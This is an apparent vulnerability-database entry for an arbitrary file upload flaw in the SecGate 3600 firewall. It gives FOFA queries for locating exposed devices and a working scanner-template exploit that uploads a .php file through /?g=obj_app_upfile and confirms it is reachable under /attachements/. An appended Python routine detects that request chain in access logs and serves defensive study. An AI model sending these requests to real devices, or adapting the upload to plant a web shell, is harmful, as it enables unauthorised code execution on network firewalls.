secgate-3600-obj-app-upfile-fileupload: 网神 SecGate 3600 firewall index arbitrary file upload

Date: 2025-09-01 | Affected software: 网神 SecGate 3600 firewall | PoC: public

Vulnerability description

fofa: title="网神SecGate 3600防火墙" fofa: fid="1Lh1LHi6yfkhiO83I59AYg=="

PoC code [public]

id: secgate-3600-obj-app-upfile-fileupload

info:
  name: 网神SecGate 3600防火墙index任意文件上传
  author: zan8in
  severity: critical
  verified: true
  description: |-
    fofa: title="网神SecGate 3600防火墙"
    fofa: fid="1Lh1LHi6yfkhiO83I59AYg=="
  tags: secgate,fileupload
  created: 2024/09/24

set:
  randstr: randomLowercase(6)
  rboundary: randomLowercase(8)
  rbody: randomLowercase(32)
rules:
  r0:
    request:
      method: POST
      path: /?g=obj_app_upfile
      headers:
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{rboundary}}
        Cookie: __s_sessionid__=lgltbghaugdq7099bftei3egh7
      body: "\
        ------WebKitFormBoundary{{rboundary}}\r\n\
        Content-Disposition: form-data; name=\"MAX_FILE_SIZE\"\r\n\
        \r\n\
        10000000\r\n\
        ------WebKitFormBoundary{{rboundary}}\r\n\
        Content-Disposition: form-data; name=\"upfile\"; filename=\"{{randstr}}.php\"\r\n\
        Content-Type: text/plain\r\n\
        \r\n\
        {{rbody}}\r\n\
        ------WebKitFormBoundary{{rboundary}}\r\n\
        Content-Disposition: form-data; name=\"submit_post\"\r\n\
        \r\n\
        obj_app_upfile\r\n\
        ------WebKitFormBoundary{{rboundary}}\r\n\
        Content-Disposition: form-data; name=\"__hash__\"\r\n\
        \r\n\
        0b9d6b1ab7479ab69d9f71b05e0e9445\r\n\
        ------WebKitFormBoundary{{rboundary}}--\r\n\
        "
    expression: response.status == 302 # && response.body.bcontains(b'windows.locadtion=')
  r1:
    request:
      method: GET
      path: /attachements/{{randstr}}.php
    expression: response.status == 200 && response.body.bcontains(bytes(rbody))
expression: r0() && r1()
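As an added detection example (not part of the original PoC, the PoC framework, or the vendor's code): a Python routine that scans web-server access logs for the two-step pattern the PoC above exercises, a POST to the obj_app_upfile handler from a client that then successfully fetches a .php file under /attachements/. The access-log format and every sample entry below are assumed and constructed for illustration.

```python
import re
from collections import defaultdict

# Constructed sample access-log lines (common-log style). Addresses, timestamps
# and file names are made up; only the paths mirror the PoC request sequence.
SAMPLE_LOG = """\
203.0.113.7 - - [01/Sep/2025:10:00:01 +0000] "POST /?g=obj_app_upfile HTTP/1.1" 302 0
203.0.113.7 - - [01/Sep/2025:10:00:02 +0000] "GET /attachements/qzkmtp.php HTTP/1.1" 200 32
198.51.100.4 - - [01/Sep/2025:10:05:00 +0000] "GET /?g=obj_app_upfile HTTP/1.1" 200 5120
198.51.100.4 - - [01/Sep/2025:10:05:30 +0000] "GET /attachements/report.pdf HTTP/1.1" 200 90112
"""

# Assumed log layout: client, two ident/user fields, [timestamp], "METHOD PATH PROTO", status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)$'
)


def detect_upload_chain(log_text):
    """Return one finding per client that fetched a .php file from /attachements/
    with HTTP 200. Confidence is 'high' when the same client also POSTed to the
    obj_app_upfile handler (the full PoC chain), 'medium' for the fetch alone."""
    posts = defaultdict(list)       # ip -> timestamps of POSTs to the upload handler
    php_fetch = defaultdict(list)   # ip -> (timestamp, path) of successful .php fetches
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that do not match the assumed layout
        method, path, status = m["method"], m["path"], m["status"]
        if method == "POST" and "g=obj_app_upfile" in path:
            posts[m["ip"]].append(m["ts"])
        lowered = path.lower()
        if (method == "GET" and lowered.startswith("/attachements/")
                and lowered.endswith(".php") and status == "200"):
            php_fetch[m["ip"]].append((m["ts"], path))

    findings = []
    for ip in sorted(php_fetch):
        findings.append({
            "ip": ip,
            "confidence": "high" if ip in posts else "medium",
            "paths": [p for _, p in php_fetch[ip]],
        })
    return findings


if __name__ == "__main__":
    for f in detect_upload_chain(SAMPLE_LOG):
        print(f)
```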
